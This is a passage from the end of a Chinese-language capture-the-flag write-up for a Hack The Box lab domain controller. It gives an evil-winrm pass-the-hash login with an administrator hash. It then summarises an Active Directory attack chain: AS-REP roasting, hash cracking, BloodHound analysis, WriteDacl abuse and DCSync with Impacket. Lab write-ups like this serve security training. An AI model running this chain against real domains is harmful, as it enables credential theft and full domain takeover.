evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
type C:\Users\administrator\Desktop\root.txt
总结
通过nmap进行信息收集发现目标机器为域控使用windapsearch发现ladp可以匿名绑定并枚举用户发现htb.local域的服务账号叫svc-alfresco是可以利用AS-REP Roasting攻击,
使用Impacket包中的GetNPUsers.py进行TGT Hash获取使用使用hashcat或john破解TGT得到明文密码使用WinRM登陆域控机器,使用SharpHound.ps1收集域信息bloodhound分析特权路径,
分析发现EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL WriteDacl DOMAIN ADMINS@HTB.LOCAL并且svc-alfresco包含于EXCHANGE组,添加hack账号到EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL
滥用WriteDacl进行权限提升,使用impacket工具包下的secretsdump.py进行Dcsync操作获得域管权限.
工具使用:
nmap
windapsearch
Impacket
hashcat
john
evil-winrm
bloodhound